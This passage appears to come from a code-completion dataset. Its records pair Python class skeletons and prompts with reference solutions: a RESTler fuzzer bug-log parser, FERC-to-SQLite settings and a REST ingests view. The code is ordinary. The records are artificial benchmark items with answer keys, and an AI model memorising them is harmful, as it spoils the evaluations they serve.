line and (not line.startswith(BUG_START)):\n seq += self._get_request(line)\n line = file.readline()\n self._bug_list[bug_type].append((seq, reproduced, bug_hash))\n else:\n line = file.readline()\n except Exception as err:\n print(f'Failed to read bug log. Log was not a complete test log.\\n{err!s}')\n raise TestFailedException\n<|end_body_2|>\n", "class_docstring": "Responsible for parsing bug bucket logs", "class_name": "BugLogParser", "detected_licenses": ["LicenseRef-scancode-generic-cla", "MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BugLogParser:\n \"\"\"Responsible for parsing bug bucket logs\"\"\"\n\n def __init__(self, path):\n \"\"\"BugLogParser constructor @param path: The path to the bug log file @type path: Str\"\"\"\n <|body_0|>\n\n def diff_log(self, other):\n \"\"\"Diffs a BugLogParser's bug list with this object's bug list @param other: The parser to compare to this one @type other: BugLogParser @return: True if the bug lists match @rtype : Bool\"\"\"\n <|body_1|>\n\n def _parse(self):\n \"\"\"Parses the bug log to populate the bug list @return: None @rtype : None\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(path)\n self._bug_list = dict()\n self._parse()\n<|end_body_0|>\n\n<|body_start_1|>\n if self._bug_list != other._bug_list:\n print('Bug lists do not match.')\n return False\n return True\n<|end_body_1|>\n\n<|body_start_2|>\n with open(self._path, 'r') as file:\n try:\n line = file.readline()\n while line:\n if line.startswith(BUG_START):\n line = file.readline()\n if line:\n bug_type = line.split(' ', 1)[0]\n if bug_type not in self._bug_list:\n self._bug_list[bug_type] = []\n reproduced = 'Bug was reproduced' in line\n line = file.readline()\n if line.startswith('Attempted'):\n line = file.readline()\n bug_hash = line.split(' ')[-1].rstrip()\n line = file.readline()\n seq = ParsedSequence([])\n while line and (not line.startswith(BUG_START)):\n seq += self._get_request(line)\n line = file.readline()\n self._bug_list[bug_type].append((seq, reproduced, bug_hash))\n else:\n line = file.readline()\n except Exception as err:\n print(f'Failed to read bug log. Log was not a complete test log.\\n{err!s}')\n raise TestFailedException\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000388", "length_bytes": 9641, "license_type": "permissive", "methods": [{"docstring": "BugLogParser constructor @param path: The path to the bug log file @type path: Str", "name": "__init__", "signature": "def __init__(self, path)"}, {"docstring": "Diffs a BugLogParser's bug list with this object's bug list @param other: The parser to compare to this one @type other: BugLogParser @return: True if the bug lists match @rtype : Bool", "name": "diff_log", "signature": "def diff_log(self, other)"}, {"docstring": "Parses the bug log to populate the bug list @return: None @rtype : None", "name": "_parse", "signature": "def _parse(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005731", "prompt": "Implement the Python class `BugLogParser` described below.\n\nClass description:\nResponsible for parsing bug bucket logs\n\nMethod signatures and docstrings:\n- def __init__(self, path): BugLogParser constructor @param path: The path to the bug log file @type path: Str\n- def diff_log(self, other): Diffs a BugLogParser's bug list with this object's bug list @param other: The parser to compare to this one @type other: BugLogParser @return: True if the bug lists match @rtype : Bool\n- def _parse(self): Parses the bug log to populate the bug list @return: None @rtype : None", "prompted_full_text": "Implement the Python class `BugLogParser` described below.\n\nClass description:\nResponsible for parsing bug bucket logs\n\nMethod signatures and docstrings:\n- def __init__(self, path): BugLogParser constructor @param path: The path to the bug log file @type path: Str\n- def diff_log(self, other): Diffs a BugLogParser's bug list with this object's bug list @param other: The parser to compare to this one @type other: BugLogParser @return: True if the bug lists match @rtype : Bool\n- def _parse(self): Parses the bug log to populate the bug list @return: None @rtype : None\n\n<|skeleton|>\nclass BugLogParser:\n \"\"\"Responsible for parsing bug bucket logs\"\"\"\n\n def __init__(self, path):\n \"\"\"BugLogParser constructor @param path: The path to the bug log file @type path: Str\"\"\"\n <|body_0|>\n\n def diff_log(self, other):\n \"\"\"Diffs a BugLogParser's bug list with this object's bug list @param other: The parser to compare to this one @type other: BugLogParser @return: True if the bug lists match @rtype : Bool\"\"\"\n <|body_1|>\n\n def _parse(self):\n \"\"\"Parses the bug log to populate the bug list @return: None @rtype : None\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(path)\n self._bug_list = dict()\n self._parse()\n<|end_body_0|>\n\n<|body_start_1|>\n if self._bug_list != other._bug_list:\n print('Bug lists do not match.')\n return False\n return True\n<|end_body_1|>\n\n<|body_start_2|>\n with open(self._path, 'r') as file:\n try:\n line = file.readline()\n while line:\n if line.startswith(BUG_START):\n line = file.readline()\n if line:\n bug_type = line.split(' ', 1)[0]\n if bug_type not in self._bug_list:\n self._bug_list[bug_type] = []\n reproduced = 'Bug was reproduced' in line\n line = file.readline()\n if line.startswith('Attempted'):\n line = file.readline()\n bug_hash = line.split(' ')[-1].rstrip()\n line = file.readline()\n seq = ParsedSequence([])\n while line and (not line.startswith(BUG_START)):\n seq += self._get_request(line)\n line = file.readline()\n self._bug_list[bug_type].append((seq, reproduced, bug_hash))\n else:\n line = file.readline()\n except Exception as err:\n print(f'Failed to read bug log. Log was not a complete test log.\\n{err!s}')\n raise TestFailedException\n<|end_body_2|>\n", "revision_id": "5a9ba1af74953334fcf54570f1e31e74ea057688", "skeleton": "<|skeleton|>\nclass BugLogParser:\n \"\"\"Responsible for parsing bug bucket logs\"\"\"\n\n def __init__(self, path):\n \"\"\"BugLogParser constructor @param path: The path to the bug log file @type path: Str\"\"\"\n <|body_0|>\n\n def diff_log(self, other):\n \"\"\"Diffs a BugLogParser's bug list with this object's bug list @param other: The parser to compare to this one @type other: BugLogParser @return: True if the bug lists match @rtype : Bool\"\"\"\n <|body_1|>\n\n def _parse(self):\n \"\"\"Parses the bug log to populate the bug list @return: None @rtype : None\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BugLogParser:\n \"\"\"Responsible for parsing bug bucket logs\"\"\"\n\n def __init__(self, path):\n \"\"\"BugLogParser constructor @param path: The path to the bug log file @type path: Str\"\"\"\n super().__init__(path)\n self._bug_list = dict()\n self._parse()\n\n def diff_log(self, other):\n \"\"\"Diffs a BugLogParser's bug list with this object's bug list @param other: The parser to compare to this one @type other: BugLogParser @return: True if the bug lists match @rtype : Bool\"\"\"\n if self._bug_list != other._bug_list:\n print('Bug lists do not match.')\n return False\n return True\n\n def _parse(self):\n \"\"\"Parses the bug log to populate the bug list @return: None @rtype : None\"\"\"\n with open(self._path, 'r') as file:\n try:\n line = file.readline()\n while line:\n if line.startswith(BUG_START):\n line = file.readline()\n if line:\n bug_type = line.split(' ', 1)[0]\n if bug_type not in self._bug_list:\n self._bug_list[bug_type] = []\n reproduced = 'Bug was reproduced' in line\n line = file.readline()\n if line.startswith('Attempted'):\n line = file.readline()\n bug_hash = line.split(' ')[-1].rstrip()\n line = file.readline()\n seq = ParsedSequence([])\n while line and (not line.startswith(BUG_START)):\n seq += self._get_request(line)\n line = file.readline()\n self._bug_list[bug_type].append((seq, reproduced, bug_hash))\n else:\n line = file.readline()\n except Exception as err:\n print(f'Failed to read bug log. Log was not a complete test log.\\n{err!s}')\n raise TestFailedException\n", "source": "the_stack_v2_python_sparse", "source_path": "restler/test_servers/log_parser.py", "source_repo": "wisec/restler-fuzzer", "split": "test", "star_events_count": 0} {"blob_id": "79c6fd96ee3fa40e17e393494783294e2869252f", "bodies": ["if not any(values.values()):\n values['ferc1_dbf_to_sqlite_settings'] = Ferc1DbfToSqliteSettings()\n values['ferc1_xbrl_to_sqlite_settings'] = Ferc1XbrlToSqliteSettings()\n values['ferc2_dbf_to_sqlite_settings'] = Ferc2DbfToSqliteSettings()\n values['ferc2_xbrl_to_sqlite_settings'] = Ferc2XbrlToSqliteSettings()\n values['ferc6_dbf_to_sqlite_settings'] = Ferc6DbfToSqliteSettings()\n values['ferc6_xbrl_to_sqlite_settings'] = Ferc6XbrlToSqliteSettings()\n values['ferc60_dbf_to_sqlite_settings'] = Ferc60DbfToSqliteSettings()\n values['ferc60_xbrl_to_sqlite_settings'] = Ferc60XbrlToSqliteSettings()\n values['ferc714_xbrl_to_sqlite_settings'] = Ferc714XbrlToSqliteSettings()\nreturn values", "match form_number:\n case XbrlFormNumber.FORM1:\n settings = self.ferc1_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM2:\n settings = self.ferc2_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM6:\n settings = self.ferc6_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM60:\n settings = self.ferc60_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM714:\n settings = self.ferc714_xbrl_to_sqlite_settings\nreturn settings"], "bodies_text": "<|body_start_0|>\n if not any(values.values()):\n values['ferc1_dbf_to_sqlite_settings'] = Ferc1DbfToSqliteSettings()\n values['ferc1_xbrl_to_sqlite_settings'] = Ferc1XbrlToSqliteSettings()\n values['ferc2_dbf_to_sqlite_settings'] = Ferc2DbfToSqliteSettings()\n values['ferc2_xbrl_to_sqlite_settings'] = Ferc2XbrlToSqliteSettings()\n values['ferc6_dbf_to_sqlite_settings'] = Ferc6DbfToSqliteSettings()\n values['ferc6_xbrl_to_sqlite_settings'] = Ferc6XbrlToSqliteSettings()\n values['ferc60_dbf_to_sqlite_settings'] = Ferc60DbfToSqliteSettings()\n values['ferc60_xbrl_to_sqlite_settings'] = Ferc60XbrlToSqliteSettings()\n values['ferc714_xbrl_to_sqlite_settings'] = Ferc714XbrlToSqliteSettings()\n return values\n<|end_body_0|>\n\n<|body_start_1|>\n match form_number:\n case XbrlFormNumber.FORM1:\n settings = self.ferc1_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM2:\n settings = self.ferc2_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM6:\n settings = self.ferc6_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM60:\n settings = self.ferc60_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM714:\n settings = self.ferc714_xbrl_to_sqlite_settings\n return settings\n<|end_body_1|>\n", "class_docstring": "An immutable pydantic model to validate FERC XBRL to SQLite settings. Args: ferc1_dbf_to_sqlite_settings: Settings for converting FERC 1 DBF data to SQLite. ferc1_xbrl_to_sqlite_settings: Settings for converting FERC 1 XBRL data to SQLite. other_xbrl_forms: List of non-FERC1 forms to convert from XBRL to SQLite.", "class_name": "FercToSqliteSettings", "detected_licenses": ["CC-BY-4.0", "MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FercToSqliteSettings:\n \"\"\"An immutable pydantic model to validate FERC XBRL to SQLite settings. Args: ferc1_dbf_to_sqlite_settings: Settings for converting FERC 1 DBF data to SQLite. ferc1_xbrl_to_sqlite_settings: Settings for converting FERC 1 XBRL data to SQLite. other_xbrl_forms: List of non-FERC1 forms to convert from XBRL to SQLite.\"\"\"\n\n def default_load_all(cls, values):\n \"\"\"If no datasets are specified default to all. Args: values (Dict[str, BaseModel]): dataset settings. Returns: values (Dict[str, BaseModel]): dataset settings.\"\"\"\n <|body_0|>\n\n def get_xbrl_dataset_settings(self, form_number: XbrlFormNumber) -> FercGenericXbrlToSqliteSettings:\n \"\"\"Return a list with all requested FERC XBRL to SQLite datasets. Args: form_number: Get settings by FERC form number.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not any(values.values()):\n values['ferc1_dbf_to_sqlite_settings'] = Ferc1DbfToSqliteSettings()\n values['ferc1_xbrl_to_sqlite_settings'] = Ferc1XbrlToSqliteSettings()\n values['ferc2_dbf_to_sqlite_settings'] = Ferc2DbfToSqliteSettings()\n values['ferc2_xbrl_to_sqlite_settings'] = Ferc2XbrlToSqliteSettings()\n values['ferc6_dbf_to_sqlite_settings'] = Ferc6DbfToSqliteSettings()\n values['ferc6_xbrl_to_sqlite_settings'] = Ferc6XbrlToSqliteSettings()\n values['ferc60_dbf_to_sqlite_settings'] = Ferc60DbfToSqliteSettings()\n values['ferc60_xbrl_to_sqlite_settings'] = Ferc60XbrlToSqliteSettings()\n values['ferc714_xbrl_to_sqlite_settings'] = Ferc714XbrlToSqliteSettings()\n return values\n<|end_body_0|>\n\n<|body_start_1|>\n match form_number:\n case XbrlFormNumber.FORM1:\n settings = self.ferc1_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM2:\n settings = self.ferc2_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM6:\n settings = self.ferc6_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM60:\n settings = self.ferc60_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM714:\n settings = self.ferc714_xbrl_to_sqlite_settings\n return settings\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000389", "length_bytes": 24804, "license_type": "permissive", "methods": [{"docstring": "If no datasets are specified default to all. Args: values (Dict[str, BaseModel]): dataset settings. Returns: values (Dict[str, BaseModel]): dataset settings.", "name": "default_load_all", "signature": "def default_load_all(cls, values)"}, {"docstring": "Return a list with all requested FERC XBRL to SQLite datasets. Args: form_number: Get settings by FERC form number.", "name": "get_xbrl_dataset_settings", "signature": "def get_xbrl_dataset_settings(self, form_number: XbrlFormNumber) -> FercGenericXbrlToSqliteSettings"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002317", "prompt": "Implement the Python class `FercToSqliteSettings` described below.\n\nClass description:\nAn immutable pydantic model to validate FERC XBRL to SQLite settings. Args: ferc1_dbf_to_sqlite_settings: Settings for converting FERC 1 DBF data to SQLite. ferc1_xbrl_to_sqlite_settings: Settings for converting FERC 1 XBRL data to SQLite. other_xbrl_forms: List of non-FERC1 forms to convert from XBRL to SQLite.\n\nMethod signatures and docstrings:\n- def default_load_all(cls, values): If no datasets are specified default to all. Args: values (Dict[str, BaseModel]): dataset settings. Returns: values (Dict[str, BaseModel]): dataset settings.\n- def get_xbrl_dataset_settings(self, form_number: XbrlFormNumber) -> FercGenericXbrlToSqliteSettings: Return a list with all requested FERC XBRL to SQLite datasets. Args: form_number: Get settings by FERC form number.", "prompted_full_text": "Implement the Python class `FercToSqliteSettings` described below.\n\nClass description:\nAn immutable pydantic model to validate FERC XBRL to SQLite settings. Args: ferc1_dbf_to_sqlite_settings: Settings for converting FERC 1 DBF data to SQLite. ferc1_xbrl_to_sqlite_settings: Settings for converting FERC 1 XBRL data to SQLite. other_xbrl_forms: List of non-FERC1 forms to convert from XBRL to SQLite.\n\nMethod signatures and docstrings:\n- def default_load_all(cls, values): If no datasets are specified default to all. Args: values (Dict[str, BaseModel]): dataset settings. Returns: values (Dict[str, BaseModel]): dataset settings.\n- def get_xbrl_dataset_settings(self, form_number: XbrlFormNumber) -> FercGenericXbrlToSqliteSettings: Return a list with all requested FERC XBRL to SQLite datasets. Args: form_number: Get settings by FERC form number.\n\n<|skeleton|>\nclass FercToSqliteSettings:\n \"\"\"An immutable pydantic model to validate FERC XBRL to SQLite settings. Args: ferc1_dbf_to_sqlite_settings: Settings for converting FERC 1 DBF data to SQLite. ferc1_xbrl_to_sqlite_settings: Settings for converting FERC 1 XBRL data to SQLite. other_xbrl_forms: List of non-FERC1 forms to convert from XBRL to SQLite.\"\"\"\n\n def default_load_all(cls, values):\n \"\"\"If no datasets are specified default to all. Args: values (Dict[str, BaseModel]): dataset settings. Returns: values (Dict[str, BaseModel]): dataset settings.\"\"\"\n <|body_0|>\n\n def get_xbrl_dataset_settings(self, form_number: XbrlFormNumber) -> FercGenericXbrlToSqliteSettings:\n \"\"\"Return a list with all requested FERC XBRL to SQLite datasets. Args: form_number: Get settings by FERC form number.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not any(values.values()):\n values['ferc1_dbf_to_sqlite_settings'] = Ferc1DbfToSqliteSettings()\n values['ferc1_xbrl_to_sqlite_settings'] = Ferc1XbrlToSqliteSettings()\n values['ferc2_dbf_to_sqlite_settings'] = Ferc2DbfToSqliteSettings()\n values['ferc2_xbrl_to_sqlite_settings'] = Ferc2XbrlToSqliteSettings()\n values['ferc6_dbf_to_sqlite_settings'] = Ferc6DbfToSqliteSettings()\n values['ferc6_xbrl_to_sqlite_settings'] = Ferc6XbrlToSqliteSettings()\n values['ferc60_dbf_to_sqlite_settings'] = Ferc60DbfToSqliteSettings()\n values['ferc60_xbrl_to_sqlite_settings'] = Ferc60XbrlToSqliteSettings()\n values['ferc714_xbrl_to_sqlite_settings'] = Ferc714XbrlToSqliteSettings()\n return values\n<|end_body_0|>\n\n<|body_start_1|>\n match form_number:\n case XbrlFormNumber.FORM1:\n settings = self.ferc1_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM2:\n settings = self.ferc2_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM6:\n settings = self.ferc6_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM60:\n settings = self.ferc60_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM714:\n settings = self.ferc714_xbrl_to_sqlite_settings\n return settings\n<|end_body_1|>\n", "revision_id": "6afae8aade053408f23ac4332d5cbb438ab72dc6", "skeleton": "<|skeleton|>\nclass FercToSqliteSettings:\n \"\"\"An immutable pydantic model to validate FERC XBRL to SQLite settings. Args: ferc1_dbf_to_sqlite_settings: Settings for converting FERC 1 DBF data to SQLite. ferc1_xbrl_to_sqlite_settings: Settings for converting FERC 1 XBRL data to SQLite. other_xbrl_forms: List of non-FERC1 forms to convert from XBRL to SQLite.\"\"\"\n\n def default_load_all(cls, values):\n \"\"\"If no datasets are specified default to all. Args: values (Dict[str, BaseModel]): dataset settings. Returns: values (Dict[str, BaseModel]): dataset settings.\"\"\"\n <|body_0|>\n\n def get_xbrl_dataset_settings(self, form_number: XbrlFormNumber) -> FercGenericXbrlToSqliteSettings:\n \"\"\"Return a list with all requested FERC XBRL to SQLite datasets. Args: form_number: Get settings by FERC form number.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FercToSqliteSettings:\n \"\"\"An immutable pydantic model to validate FERC XBRL to SQLite settings. Args: ferc1_dbf_to_sqlite_settings: Settings for converting FERC 1 DBF data to SQLite. ferc1_xbrl_to_sqlite_settings: Settings for converting FERC 1 XBRL data to SQLite. other_xbrl_forms: List of non-FERC1 forms to convert from XBRL to SQLite.\"\"\"\n\n def default_load_all(cls, values):\n \"\"\"If no datasets are specified default to all. Args: values (Dict[str, BaseModel]): dataset settings. Returns: values (Dict[str, BaseModel]): dataset settings.\"\"\"\n if not any(values.values()):\n values['ferc1_dbf_to_sqlite_settings'] = Ferc1DbfToSqliteSettings()\n values['ferc1_xbrl_to_sqlite_settings'] = Ferc1XbrlToSqliteSettings()\n values['ferc2_dbf_to_sqlite_settings'] = Ferc2DbfToSqliteSettings()\n values['ferc2_xbrl_to_sqlite_settings'] = Ferc2XbrlToSqliteSettings()\n values['ferc6_dbf_to_sqlite_settings'] = Ferc6DbfToSqliteSettings()\n values['ferc6_xbrl_to_sqlite_settings'] = Ferc6XbrlToSqliteSettings()\n values['ferc60_dbf_to_sqlite_settings'] = Ferc60DbfToSqliteSettings()\n values['ferc60_xbrl_to_sqlite_settings'] = Ferc60XbrlToSqliteSettings()\n values['ferc714_xbrl_to_sqlite_settings'] = Ferc714XbrlToSqliteSettings()\n return values\n\n def get_xbrl_dataset_settings(self, form_number: XbrlFormNumber) -> FercGenericXbrlToSqliteSettings:\n \"\"\"Return a list with all requested FERC XBRL to SQLite datasets. Args: form_number: Get settings by FERC form number.\"\"\"\n match form_number:\n case XbrlFormNumber.FORM1:\n settings = self.ferc1_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM2:\n settings = self.ferc2_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM6:\n settings = self.ferc6_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM60:\n settings = self.ferc60_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM714:\n settings = self.ferc714_xbrl_to_sqlite_settings\n return settings\n", "source": "the_stack_v2_python_sparse", "source_path": "src/pudl/settings.py", "source_repo": "catalyst-cooperative/pudl", "split": "test", "star_events_count": 382} {"blob_id": "09ceeff88db61da4ecf6a84878bedc5302bdf39a", "bodies": ["if self.request.version == 'v6':\n return IngestSerializerV6\nelif self.request.version == 'v7':\n return IngestSerializerV6", "if request.version == 'v6':\n return self.list_impl(request)\nelif request.version == 'v7':\n return self.list_impl(request)\nraise Http404()", "started = rest_util.parse_timestamp(request, 'started', required=False)\nended = rest_util.parse_timestamp(request, 'ended', required=False)\nrest_util.check_time_range(started, ended)\ningest_statuses = rest_util.parse_string_list(request, 'status', required=False)\nstrike_ids = rest_util.parse_int_list(request, 'strike_id', required=False)\nscan_ids = rest_util.parse_int_list(request, 'scan_id', required=False)\nfile_name = rest_util.parse_string(request, 'file_name', required=False)\norder = rest_util.parse_string_list(request, 'order', required=False)\ningests = Ingest.objects.get_ingests(started=started, ended=ended, statuses=ingest_statuses, scan_ids=scan_ids, strike_ids=strike_ids, file_name=file_name, order=order)\npage = self.paginate_queryset(ingests)\nserializer = self.get_serializer(page, many=True)\nreturn self.get_paginated_response(serializer.data)"], "bodies_text": "<|body_start_0|>\n if self.request.version == 'v6':\n return IngestSerializerV6\n elif self.request.version == 'v7':\n return IngestSerializerV6\n<|end_body_0|>\n\n<|body_start_1|>\n if request.version == 'v6':\n return self.list_impl(request)\n elif request.version == 'v7':\n return self.list_impl(request)\n raise Http404()\n<|end_body_1|>\n\n<|body_start_2|>\n started = rest_util.parse_timestamp(request, 'started', required=False)\n ended = rest_util.parse_timestamp(request, 'ended', required=False)\n rest_util.check_time_range(started, ended)\n ingest_statuses = rest_util.parse_string_list(request, 'status', required=False)\n strike_ids = rest_util.parse_int_list(request, 'strike_id', required=False)\n scan_ids = rest_util.parse_int_list(request, 'scan_id', required=False)\n file_name = rest_util.parse_string(request, 'file_name', required=False)\n order = rest_util.parse_string_list(request, 'order', required=False)\n ingests = Ingest.objects.get_ingests(started=started, ended=ended, statuses=ingest_statuses, scan_ids=scan_ids, strike_ids=strike_ids, file_name=file_name, order=order)\n page = self.paginate_queryset(ingests)\n serializer = self.get_serializer(page, many=True)\n return self.get_paginated_response(serializer.data)\n<|end_body_2|>\n", "class_docstring": "This view is the endpoint for retrieving the list of all ingests.", "class_name": "IngestsView", "detected_licenses": ["LicenseRef-scancode-free-unknown", "Apache-2.0", "LicenseRef-scancode-public-domain"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass IngestsView:\n \"\"\"This view is the endpoint for retrieving the list of all ingests.\"\"\"\n\n def get_serializer_class(self):\n \"\"\"Returns the appropriate serializer based off the requests version of the REST API\"\"\"\n <|body_0|>\n\n def list(self, request):\n \"\"\"Determine api version and call specific method :param request: the HTTP POST request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user\"\"\"\n <|body_1|>\n\n def list_impl(self, request):\n \"\"\"Retrieves the list of all ingests and returns it in JSON form :param request: the HTTP GET request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.request.version == 'v6':\n return IngestSerializerV6\n elif self.request.version == 'v7':\n return IngestSerializerV6\n<|end_body_0|>\n\n<|body_start_1|>\n if request.version == 'v6':\n return self.list_impl(request)\n elif request.version == 'v7':\n return self.list_impl(request)\n raise Http404()\n<|end_body_1|>\n\n<|body_start_2|>\n started = rest_util.parse_timestamp(request, 'started', required=False)\n ended = rest_util.parse_timestamp(request, 'ended', required=False)\n rest_util.check_time_range(started, ended)\n ingest_statuses = rest_util.parse_string_list(request, 'status', required=False)\n strike_ids = rest_util.parse_int_list(request, 'strike_id', required=False)\n scan_ids = rest_util.parse_int_list(request, 'scan_id', required=False)\n file_name = rest_util.parse_string(request, 'file_name', required=False)\n order = rest_util.parse_string_list(request, 'order', required=False)\n ingests = Ingest.objects.get_ingests(started=started, ended=ended, statuses=ingest_statuses, scan_ids=scan_ids, strike_ids=strike_ids, file_name=file_name, order=order)\n page = self.paginate_queryset(ingests)\n serializer = self.get_serializer(page, many=True)\n return self.get_paginated_response(serializer.data)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000390", "length_bytes": 30689, "license_type": "permissive", "methods": [{"docstring": "Returns the appropriate serializer based off the requests version of the REST API", "name": "get_serializer_class", "signature": "def get_serializer_class(self)"}, {"docstring": "Determine api version and call specific method :param request: the HTTP POST request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user", "name": "list", "signature": "def list(self, request)"}, {"docstring": "Retrieves the list of all ingests and returns it in JSON form :param request: the HTTP GET request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user", "name": "list_impl", "signature": "def list_impl(self, request)"}], "n_methods": 3, "prompt": "Implement the Python class `IngestsView` described below.\n\nClass description:\nThis view is the endpoint for retrieving the list of all ingests.\n\nMethod signatures and docstrings:\n- def get_serializer_class(self): Returns the appropriate serializer based off the requests version of the REST API\n- def list(self, request): Determine api version and call specific method :param request: the HTTP POST request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user\n- def list_impl(self, request): Retrieves the list of all ingests and returns it in JSON form :param request: the HTTP GET request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user", "prompted_full_text": "Implement the Python class `IngestsView` described below.\n\nClass description:\nThis view is the endpoint for retrieving the list of all ingests.\n\nMethod signatures and docstrings:\n- def get_serializer_class(self): Returns the appropriate serializer based off the requests version of the REST API\n- def list(self, request): Determine api version and call specific method :param request: the HTTP POST request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user\n- def list_impl(self, request): Retrieves the list of all ingests and returns it in JSON form :param request: the HTTP GET request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user\n\n<|skeleton|>\nclass IngestsView:\n \"\"\"This view is the endpoint for retrieving the list of all ingests.\"\"\"\n\n def get_serializer_class(self):\n \"\"\"Returns the appropriate serializer based off the requests version of the REST API\"\"\"\n <|body_0|>\n\n def list(self, request):\n \"\"\"Determine api version and call specific method :param request: the HTTP POST request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user\"\"\"\n <|body_1|>\n\n def list_impl(self, request):\n \"\"\"Retrieves the list of all ingests and returns it in JSON form :param request: the HTTP GET request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.request.version == 'v6':\n return IngestSerializerV6\n elif self.request.version == 'v7':\n return IngestSerializerV6\n<|end_body_0|>\n\n<|body_start_1|>\n if request.version == 'v6':\n return self.list_impl(request)\n elif request.version == 'v7':\n return self.list_impl(request)\n raise Http404()\n<|end_body_1|>\n\n<|body_start_2|>\n started = rest_util.parse_timestamp(request, 'started', required=False)\n ended = rest_util.parse_timestamp(request, 'ended', required=False)\n rest_util.check_time_range(started, ended)\n ingest_statuses = rest_util.parse_string_list(request, 'status', required=False)\n strike_ids = rest_util.parse_int_list(request, 'strike_id', required=False)\n scan_ids = rest_util.parse_int_list(request, 'scan_id', required=False)\n file_name = rest_util.parse_string(request, 'file_name', required=False)\n order = rest_util.parse_string_list(request, 'order', required=False)\n ingests = Ingest.objects.get_ingests(started=started, ended=ended, statuses=ingest_statuses, scan_ids=scan_ids, strike_ids=strike_ids, file_name=file_name, order=order)\n page = self.paginate_queryset(ingests)\n serializer = self.get_serializer(page, many=True)\n return self.get_paginated_response(serializer.data)\n<|end_body_2|>\n", "revision_id": "28618aee07ceed9e4a6eb7b8d0e6f05b31d8fd6b", "skeleton": "<|skeleton|>\nclass IngestsView:\n \"\"\"This view is the endpoint for retrieving the list of all ingests.\"\"\"\n\n def get_serializer_class(self):\n \"\"\"Returns the appropriate serializer based off the requests version of the REST API\"\"\"\n <|body_0|>\n\n def list(self, request):\n \"\"\"Determine api version and call specific method :param request: the HTTP POST request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user\"\"\"\n <|body_1|>\n\n def list_impl(self, request):\n \"\"\"Retrieves the list of all ingests and returns it in JSON form :param request: the HTTP GET request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class IngestsView:\n \"\"\"This view is the endpoint for retrieving the list of all ingests.\"\"\"\n\n def get_serializer_class(self):\n \"\"\"Returns the appropriate serializer based off the requests version of the REST API\"\"\"\n if self.request.version == 'v6':\n return IngestSerializerV6\n elif self.request.version == 'v7':\n return IngestSerializerV6\n\n def list(self, request):\n \"\"\"Determine api version and call specific method :param request: the HTTP POST request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user\"\"\"\n if request.version == 'v6':\n return self.list_impl(request)\n elif request.version == 'v7':\n return self.list_impl(request)\n raise Http404()\n\n def list_impl(self, request):\n \"\"\"Retrieves the list of all ingests and returns it in JSON form :param request: the HTTP GET request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send 